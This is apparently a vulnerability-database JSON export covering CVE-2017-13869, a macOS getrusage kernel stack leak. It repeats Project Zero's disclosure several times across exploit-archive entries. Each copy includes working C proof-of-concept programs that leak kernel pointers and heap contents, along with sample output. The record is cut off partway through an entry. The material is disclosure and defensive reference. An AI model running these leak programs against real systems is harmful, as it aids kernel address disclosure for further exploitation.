(empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\nfixed_version = \"10.13.2\";\n\nif (version !~\"^10\\.13($|[^0-9])\")\n audit(AUDIT_OS_NOT, \"macOS 10.13.x\");\n\nif (ver_compare(ver:version, fix:'10.13.2', strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-12-25T18:33:48", "description": "For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:\r\n```\r\nint\r\ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)\r\n{\r\n struct rusage *rup, rubuf;\r\n struct user64_rusage rubuf64;\r\n 
struct user32_rusage rubuf32;\r\n size_t retsize = sizeof(rubuf); /* default: 32 bits */\r\n caddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */\r\n struct timeval utime;\r\n struct timeval stime;\r\n\r\n\r\n switch (uap->who) {\r\n case RUSAGE_SELF:\r\n calcru(p, &utime, &stime, NULL);\r\n proc_lock(p);\r\n rup = &p->p_stats->p_ru;\r\n rup->ru_utime = utime;\r\n rup->ru_stime = stime;\r\n\r\n rubuf = *rup;\r\n proc_unlock(p);\r\n\r\n break;\r\n [...]\r\n }\r\n if (IS_64BIT_PROCESS(p)) {\r\n retsize = sizeof(rubuf64);\r\n retbuf = (caddr_t)&rubuf64;\r\n munge_user64_rusage(&rubuf, &rubuf64);\r\n } else {\r\n [...]\r\n }\r\n\r\n return (copyout(retbuf, uap->rusage, retsize));\r\n}\r\n```\r\n`munge_user64_rusage()` performs the conversion by copying individual fields:\r\n```\r\n__private_extern__ void \r\nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)\r\n{\r\n /* timeval changes size, so utime and stime need special handling */\r\n a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;\r\n a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;\r\n a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;\r\n a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;\r\n[...]\r\n}\r\n```\r\n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:\r\n```\r\n#define _STRUCT_USER64_TIMEVAL struct user64_timeval\r\n_STRUCT_USER64_TIMEVAL\r\n{\r\n user64_time_t tv_sec; /* seconds */\r\n __int32_t tv_usec; /* and microseconds */\r\n};\r\n\r\nstruct user64_rusage {\r\n struct user64_timeval ru_utime; /* user time used */\r\n struct user64_timeval ru_stime; /* system time used */\r\n user64_long_t ru_maxrss; /* max resident set size */\r\n[...]\r\n};\r\n```\r\nThis padding is not initialized, but is copied to userspace.\r\n\r\n\r\nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.\r\n\r\n\r\nJust leaking stack data from a 
previous syscall seems to mostly return the upper halfes of some kernel pointers.\r\nThe returned data seems to come from the previous syscall:\r\n```\r\n$ cat test.c\r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n printf(\"leak1: 0x%08x\\n\", leak1);\r\n printf(\"leak2: 0x%08x\\n\", leak2);\r\n}\r\n\r\nint main(void) {\r\n do_leak();\r\n do_leak();\r\n do_leak();\r\n int fd = open(\"/dev/null\", O_RDONLY);\r\n do_leak();\r\n int dummy;\r\n read(fd, &dummy, 4);\r\n do_leak();\r\n return 0;\r\n}\r\n```\r\n\r\n```\r\n$ gcc -o test test.c && ./test\r\nleak1: 0x00000000\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff81\r\nleak2: 0x00000000\r\n```\r\n\r\nHowever, I believe that this can also be used to disclose kernel heap memory.\r\nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack\r\nwithout zeroing it, so the new stack contains data from previous heap allocations.\r\nThe following testcase, when run after repeatedly reading a wordlist into memory,\r\nleaks some non-pointer data that seems to come from the wordlist:\r\n```\r\n$ cat forktest.c \r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n char str[1000];\r\n if (leak1 != 0) {\r\n sprintf(str, \"leak1: 0x%08x\\n\", leak1);\r\n write(1, str, strlen(str));\r\n }\r\n 
if (leak2 != 0) {\r\n sprintf(str, \"leak2: 0x%08x\\n\", leak2);\r\n write(1, str, strlen(str));\r\n }\r\n}\r\n\r\nvoid leak_in_child(void) {\r\n int res_pid, res2;\r\n asm volatile(\r\n \"mov $0x02000002, %%rax\\n\\t\"\r\n \"syscall\\n\\t\"\r\n : \"=a\"(res_pid), \"=d\"(res2)\r\n :\r\n : \"cc\", \"memory\", \"rcx\", \"r11\"\r\n );\r\n //write(1, \"postfork\\n\", 9);\r\n if (res2 == 1) {\r\n //write(1, \"child\\n\", 6);\r\n do_leak();\r\n char dummy;\r\n read(0, &dummy, 1);\r\n asm volatile(\r\n \"mov $0x02000001, %rax\\n\\t\"\r\n \"mov $0, %rdi\\n\\t\"\r\n \"syscall\\n\\t\"\r\n );\r\n }\r\n //printf(\"fork=%d:%d\\n\", res_pid, res2);\r\n int wait_res;\r\n //wait(&wait_res);\r\n}\r\n\r\nint main(void) {\r\n for(int i=0; i<1000; i++) {\r\n leak_in_child();\r\n }\r\n}\r\n```\r\n\r\n```\r\n$ gcc -o forktest forktest.c && ./forktest\r\nleak1: 0x1b3b1320\r\nleak1: 0x00007f00\r\nleak1: 0x65686375\r\nleak1: 0x410a2d63\r\nleak1: 0x8162ced5\r\nleak1: 0x65736168\r\nleak1: 0x0000042b\r\n```\r\nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist.\r\n\r\n\r\nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). 
As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.", "published": "2017-12-15T00:00:00", "type": "seebug", "title": "MacOS getrusage stack leak through struct padding(CVE-2017-13869)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13869"], "modified": "2017-12-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96990", "id": "SSV:96990", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-14T15:50:10", "description": "Exploit for macOS platform in category dos / poc", "edition": 1, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "macOS getrusage Stack Leak Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13869"], "modified": "2017-12-12T00:00:00", "href": "https://0day.today/exploit/description/29199", "id": "1337DAY-ID-29199", "sourceData": "MacOS getrusage stack leak through struct padding \r\n\r\nCVE-2017-13869\r\n\r\n\r\nFor 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:\r\n\r\nint\r\ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)\r\n{\r\n struct rusage *rup, rubuf;\r\n struct user64_rusage rubuf64;\r\n struct user32_rusage rubuf32;\r\n size_t retsize = sizeof(rubuf); /* default: 32 bits */\r\n caddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */\r\n struct timeval utime;\r\n struct timeval stime;\r\n\r\n\r\n switch (uap->who) {\r\n case RUSAGE_SELF:\r\n calcru(p, &utime, &stime, NULL);\r\n proc_lock(p);\r\n rup = &p->p_stats->p_ru;\r\n rup->ru_utime = utime;\r\n rup->ru_stime = stime;\r\n\r\n rubuf = *rup;\r\n proc_unlock(p);\r\n\r\n break;\r\n [...]\r\n }\r\n if (IS_64BIT_PROCESS(p)) {\r\n retsize = sizeof(rubuf64);\r\n retbuf = (caddr_t)&rubuf64;\r\n 
munge_user64_rusage(&rubuf, &rubuf64);\r\n } else {\r\n [...]\r\n }\r\n\r\n return (copyout(retbuf, uap->rusage, retsize));\r\n}\r\n\r\n`munge_user64_rusage()` performs the conversion by copying individual fields:\r\n\r\n__private_extern__ void \r\nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)\r\n{\r\n /* timeval changes size, so utime and stime need special handling */\r\n a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;\r\n a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;\r\n a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;\r\n a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;\r\n[...]\r\n}\r\n\r\n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:\r\n\r\n#define _STRUCT_USER64_TIMEVAL struct user64_timeval\r\n_STRUCT_USER64_TIMEVAL\r\n{\r\n user64_time_t tv_sec; /* seconds */\r\n __int32_t tv_usec; /* and microseconds */\r\n};\r\n\r\nstruct user64_rusage {\r\n struct user64_timeval ru_utime; /* user time used */\r\n struct user64_timeval ru_stime; /* system time used */\r\n user64_long_t ru_maxrss; /* max resident set size */\r\n[...]\r\n};\r\n\r\nThis padding is not initialized, but is copied to userspace.\r\n\r\n\r\nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.\r\n\r\n\r\nJust leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers.\r\nThe returned data seems to come from the previous syscall:\r\n\r\n$ cat test.c\r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n printf(\"leak1: 0x%08x\\n\", leak1);\r\n printf(\"leak2: 
0x%08x\\n\", leak2);\r\n}\r\n\r\nint main(void) {\r\n do_leak();\r\n do_leak();\r\n do_leak();\r\n int fd = open(\"/dev/null\", O_RDONLY);\r\n do_leak();\r\n int dummy;\r\n read(fd, &dummy, 4);\r\n do_leak();\r\n return 0;\r\n}\r\n$ gcc -o test test.c && ./test\r\nleak1: 0x00000000\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff81\r\nleak2: 0x00000000\r\n\r\n\r\nHowever, I believe that this can also be used to disclose kernel heap memory.\r\nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack\r\nwithout zeroing it, so the new stack contains data from previous heap allocations.\r\nThe following testcase, when run after repeatedly reading a wordlist into memory,\r\nleaks some non-pointer data that seems to come from the wordlist:\r\n\r\n$ cat forktest.c \r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4); /* padding behind ru_utime.tv_usec */\r\n memcpy(&leak2, ((char*)&ru)+28, 4); /* padding behind ru_stime.tv_usec */\r\n char str[1000];\r\n if (leak1 != 0) {\r\n sprintf(str, \"leak1: 0x%08x\\n\", leak1);\r\n write(1, str, strlen(str));\r\n }\r\n if (leak2 != 0) {\r\n sprintf(str, \"leak2: 0x%08x\\n\", leak2);\r\n write(1, str, strlen(str));\r\n }\r\n}\r\n\r\nvoid leak_in_child(void) {\r\n int res_pid, res2;\r\n /* raw fork() syscall; XNU sets rdx to 1 in the child */\r\n asm volatile(\r\n \"mov $0x02000002, %%rax\\n\\t\"\r\n \"syscall\\n\\t\"\r\n : \"=a\"(res_pid), \"=d\"(res2)\r\n :\r\n : \"cc\", \"memory\", \"rcx\", \"r11\"\r\n );\r\n //write(1, \"postfork\\n\", 9);\r\n if (res2 == 1) {\r\n //write(1, \"child\\n\", 6);\r\n do_leak();\r\n char dummy;\r\n read(0, &dummy, 1);\r\n /* raw _exit(0) */\r\n asm volatile(\r\n \"mov $0x02000001, 
%rax\\n\\t\"\r\n \"mov $0, %rdi\\n\\t\"\r\n \"syscall\\n\\t\"\r\n );\r\n }\r\n //printf(\"fork=%d:%d\\n\", res_pid, res2);\r\n int wait_res;\r\n //wait(&wait_res);\r\n}\r\n\r\nint main(void) {\r\n for(int i=0; i<1000; i++) {\r\n leak_in_child();\r\n }\r\n}\r\n$ gcc -o forktest forktest.c && ./forktest\r\nleak1: 0x1b3b1320\r\nleak1: 0x00007f00\r\nleak1: 0x65686375\r\nleak1: 0x410a2d63\r\nleak1: 0x8162ced5\r\nleak1: 0x65736168\r\nleak1: 0x0000042b\r\n\r\nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist.\r\n\r\n\r\nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. 
After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\nFound by: jannh\r\n\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29199", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2017-12-13T22:59:48", "description": "", "published": "2017-12-12T00:00:00", "type": "packetstorm", "title": "macOS getrusage Stack Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13869"], "modified": "2017-12-12T00:00:00", "id": "PACKETSTORM:145364", "href": "https://packetstormsecurity.com/files/145364/macOS-getrusage-Stack-Leak.html", "sourceData": "`MacOS getrusage stack leak through struct padding \n \nCVE-2017-13869 \n \n \nFor 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace: \n \nint \ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval) \n{ \nstruct rusage *rup, rubuf; \nstruct user64_rusage rubuf64; \nstruct user32_rusage rubuf32; \nsize_t retsize = sizeof(rubuf); /* default: 32 bits */ \ncaddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */ \nstruct timeval utime; \nstruct timeval stime; \n \n \nswitch (uap->who) { \ncase RUSAGE_SELF: \ncalcru(p, &utime, &stime, NULL); \nproc_lock(p); \nrup = &p->p_stats->p_ru; \nrup->ru_utime = utime; \nrup->ru_stime = stime; \n \nrubuf = *rup; \nproc_unlock(p); \n \nbreak; \n[...] \n} \nif (IS_64BIT_PROCESS(p)) { \nretsize = sizeof(rubuf64); \nretbuf = (caddr_t)&rubuf64; \nmunge_user64_rusage(&rubuf, &rubuf64); \n} else { \n[...] 
\n} \n \nreturn (copyout(retbuf, uap->rusage, retsize)); \n} \n \n`munge_user64_rusage()` performs the conversion by copying individual fields: \n \n__private_extern__ void \nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p) \n{ \n/* timeval changes size, so utime and stime need special handling */ \na_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec; \na_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec; \na_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec; \na_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec; \n[...] \n} \n \n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element: \n \n#define _STRUCT_USER64_TIMEVAL struct user64_timeval \n_STRUCT_USER64_TIMEVAL \n{ \nuser64_time_t tv_sec; /* seconds */ \n__int32_t tv_usec; /* and microseconds */ \n}; \n \nstruct user64_rusage { \nstruct user64_timeval ru_utime; /* user time used */ \nstruct user64_timeval ru_stime; /* system time used */ \nuser64_long_t ru_maxrss; /* max resident set size */ \n[...] \n}; \n \nThis padding is not initialized, but is copied to userspace. \n \n \nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0. \n \n \nJust leaking stack data from a previous syscall seems to mostly return the upper halves of some kernel pointers. 
\nThe returned data seems to come from the previous syscall: \n \n$ cat test.c \n#include <sys/resource.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <fcntl.h> \n#include <unistd.h> \n \nvoid do_leak(void) { \nstatic struct rusage ru; \ngetrusage(RUSAGE_SELF, &ru); \nstatic unsigned int leak1, leak2; \nmemcpy(&leak1, ((char*)&ru)+12, 4); /* padding behind ru_utime.tv_usec */ \nmemcpy(&leak2, ((char*)&ru)+28, 4); /* padding behind ru_stime.tv_usec */ \nprintf(\"leak1: 0x%08x\\n\", leak1); \nprintf(\"leak2: 0x%08x\\n\", leak2); \n} \n \nint main(void) { \ndo_leak(); \ndo_leak(); \ndo_leak(); \nint fd = open(\"/dev/null\", O_RDONLY); \ndo_leak(); \nint dummy; \nread(fd, &dummy, 4); \ndo_leak(); \nreturn 0; \n} \n$ gcc -o test test.c && ./test \nleak1: 0x00000000 \nleak2: 0x00000000 \nleak1: 0xffffff80 \nleak2: 0x00000000 \nleak1: 0xffffff80 \nleak2: 0x00000000 \nleak1: 0xffffff80 \nleak2: 0x00000000 \nleak1: 0xffffff81 \nleak2: 0x00000000 \n \n \nHowever, I believe that this can also be used to disclose kernel heap memory. \nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack \nwithout zeroing it, so the new stack contains data from previous heap allocations. 
\nThe following testcase, when run after repeatedly reading a wordlist into memory, \nleaks some non-pointer data that seems to come from the wordlist: \n \n$ cat forktest.c \n#include <sys/resource.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <fcntl.h> \n#include <unistd.h> \n \nvoid do_leak(void) { \nstatic struct rusage ru; \ngetrusage(RUSAGE_SELF, &ru); \nstatic unsigned int leak1, leak2; \nmemcpy(&leak1, ((char*)&ru)+12, 4); /* padding behind ru_utime.tv_usec */ \nmemcpy(&leak2, ((char*)&ru)+28, 4); /* padding behind ru_stime.tv_usec */ \nchar str[1000]; \nif (leak1 != 0) { \nsprintf(str, \"leak1: 0x%08x\\n\", leak1); \nwrite(1, str, strlen(str)); \n} \nif (leak2 != 0) { \nsprintf(str, \"leak2: 0x%08x\\n\", leak2); \nwrite(1, str, strlen(str)); \n} \n} \n \nvoid leak_in_child(void) { \nint res_pid, res2; \n/* raw fork() syscall; XNU sets rdx to 1 in the child */ \nasm volatile( \n\"mov $0x02000002, %%rax\\n\\t\" \n\"syscall\\n\\t\" \n: \"=a\"(res_pid), \"=d\"(res2) \n: \n: \"cc\", \"memory\", \"rcx\", \"r11\" \n); \n//write(1, \"postfork\\n\", 9); \nif (res2 == 1) { \n//write(1, \"child\\n\", 6); \ndo_leak(); \nchar dummy; \nread(0, &dummy, 1); \n/* raw _exit(0) */ \nasm volatile( \n\"mov $0x02000001, %rax\\n\\t\" \n\"mov $0, %rdi\\n\\t\" \n\"syscall\\n\\t\" \n); \n} \n//printf(\"fork=%d:%d\\n\", res_pid, res2); \nint wait_res; \n//wait(&wait_res); \n} \n \nint main(void) { \nfor(int i=0; i<1000; i++) { \nleak_in_child(); \n} \n} \n$ gcc -o forktest forktest.c && ./forktest \nleak1: 0x1b3b1320 \nleak1: 0x00007f00 \nleak1: 0x65686375 \nleak1: 0x410a2d63 \nleak1: 0x8162ced5 \nleak1: 0x65736168 \nleak1: 0x0000042b \n \nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist. \n \n \nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). 
As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack. \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \nFound by: jannh \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/145364/GS20171212052204.txt"}], "exploitdb": [{"lastseen": "2017-12-11T20:50:14", "description": "macOS - 'getrusage' Stack Leak Through struct Padding. CVE-2017-13869. Dos exploit for macOS platform", "published": "2017-12-11T00:00:00", "type": "exploitdb", "title": "macOS - 'getrusage' Stack Leak Through struct Padding", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-13869"], "modified": "2017-12-11T00:00:00", "id": "EDB-ID:43319", "href": "https://www.exploit-db.com/exploits/43319/", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405\r\n\r\nFor 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:\r\n\r\nint\r\ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)\r\n{\r\n struct rusage *rup, rubuf;\r\n struct user64_rusage rubuf64;\r\n struct user32_rusage rubuf32;\r\n size_t retsize = sizeof(rubuf); // default: 32 bits \r\n caddr_t retbuf = (caddr_t)&rubuf; // default: 32 bits \r\n struct timeval utime;\r\n struct timeval stime;\r\n\r\n\r\n switch (uap->who) {\r\n case RUSAGE_SELF:\r\n calcru(p, &utime, &stime, NULL);\r\n proc_lock(p);\r\n rup = &p->p_stats->p_ru;\r\n rup->ru_utime = utime;\r\n rup->ru_stime = stime;\r\n\r\n rubuf = *rup;\r\n proc_unlock(p);\r\n\r\n break;\r\n [...]\r\n }\r\n if (IS_64BIT_PROCESS(p)) {\r\n retsize = sizeof(rubuf64);\r\n 
retbuf = (caddr_t)&rubuf64;\r\n munge_user64_rusage(&rubuf, &rubuf64);\r\n } else {\r\n [...]\r\n }\r\n\r\n return (copyout(retbuf, uap->rusage, retsize));\r\n}\r\n\r\n`munge_user64_rusage()` performs the conversion by copying individual fields:\r\n\r\n__private_extern__ void \r\nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)\r\n{\r\n // timeval changes size, so utime and stime need special handling \r\n a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;\r\n a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;\r\n a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;\r\n a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;\r\n[...]\r\n}\r\n\r\n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:\r\n\r\n#define _STRUCT_USER64_TIMEVAL struct user64_timeval\r\n_STRUCT_USER64_TIMEVAL\r\n{\r\n user64_time_t tv_sec; // seconds \r\n __int32_t tv_usec; // and microseconds \r\n};\r\n\r\nstruct user64_rusage {\r\n struct user64_timeval ru_utime; // user time used \r\n struct user64_timeval ru_stime; // system time used \r\n user64_long_t ru_maxrss; // max resident set size \r\n[...]\r\n};\r\n\r\nThis padding is not initialized, but is copied to userspace.\r\n\r\n\r\nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.\r\n\r\n\r\nJust leaking stack data from a previous syscall seems to mostly return the upper halves of some kernel pointers.\r\nThe returned data seems to come from the previous syscall:\r\n\r\n$ cat test.c\r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4); // padding behind ru_utime.tv_usec\r\n memcpy(&leak2, ((char*)&ru)+28, 4); // padding behind ru_stime.tv_usec\r\n printf(\"leak1: 0x%08x\\n\", leak1);\r\n 
printf(\"leak2: 0x%08x\\n\", leak2);\r\n}\r\n\r\nint main(void) {\r\n do_leak();\r\n do_leak();\r\n do_leak();\r\n int fd = open(\"/dev/null\", O_RDONLY);\r\n do_leak();\r\n int dummy;\r\n read(fd, &dummy, 4);\r\n do_leak();\r\n return 0;\r\n}\r\n$ gcc -o test test.c && ./test\r\nleak1: 0x00000000\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff81\r\nleak2: 0x00000000\r\n\r\n\r\nHowever, I believe that this can also be used to disclose kernel heap memory.\r\nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack\r\nwithout zeroing it, so the new stack contains data from previous heap allocations.\r\nThe following testcase, when run after repeatedly reading a wordlist into memory,\r\nleaks some non-pointer data that seems to come from the wordlist:\r\n\r\n$ cat forktest.c \r\n*/\r\n\r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak2, ((char*)&ru)+28, 4);\r\n char str[1000];\r\n if (leak1 != 0) {\r\n sprintf(str, \"leak1: 0x%08x\\n\", leak1);\r\n write(1, str, strlen(str));\r\n }\r\n if (leak2 != 0) {\r\n sprintf(str, \"leak2: 0x%08x\\n\", leak2);\r\n write(1, str, strlen(str));\r\n }\r\n}\r\n\r\nvoid leak_in_child(void) {\r\n int res_pid, res2;\r\n asm volatile(\r\n \"mov $0x02000002, %%rax\\n\\t\"\r\n \"syscall\\n\\t\"\r\n : \"=a\"(res_pid), \"=d\"(res2)\r\n :\r\n : \"cc\", \"memory\", \"rcx\", \"r11\"\r\n );\r\n //write(1, \"postfork\\n\", 9);\r\n if (res2 == 1) {\r\n //write(1, \"child\\n\", 6);\r\n do_leak();\r\n char dummy;\r\n read(0, &dummy, 1);\r\n asm volatile(\r\n \"mov $0x02000001, %rax\\n\\t\"\r\n \"mov $0, %rdi\\n\\t\"\r\n 
\"syscall\\n\\t\"\r\n );\r\n }\r\n //printf(\"fork=%d:%d\\n\", res_pid, res2);\r\n int wait_res;\r\n //wait(&wait_res);\r\n}\r\n\r\nint main(void) {\r\n for(int i=0; i<1000; i++) {\r\n leak_in_child();\r\n }\r\n}\r\n/*\r\n$ gcc -o forktest forktest.c && ./forktest\r\nleak1: 0x1b3b1320\r\nleak1: 0x00007f00\r\nleak1: 0x65686375\r\nleak1: 0x410a2d63\r\nleak1: 0x8162ced5\r\nleak1: 0x65736168\r\nleak1: 0x0000042b\r\n\r\nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist.\r\n\r\n\r\nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.\r\n*/", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43319/"}], "openvas": [{"lastseen": "2019-05-29T18:34:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798", "CVE-2017-13844", "CVE-2017-13869", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13904", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13833", "CVE-2017-13867", "CVE-2017-10002", "CVE-2017-7173", "CVE-2017-7154", "CVE-2017-13862"], "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "modified": "2019-03-18T00:00:00", "published": "2017-12-07T00:00:00", "id": "OPENVAS:1361412562310812401", "href": 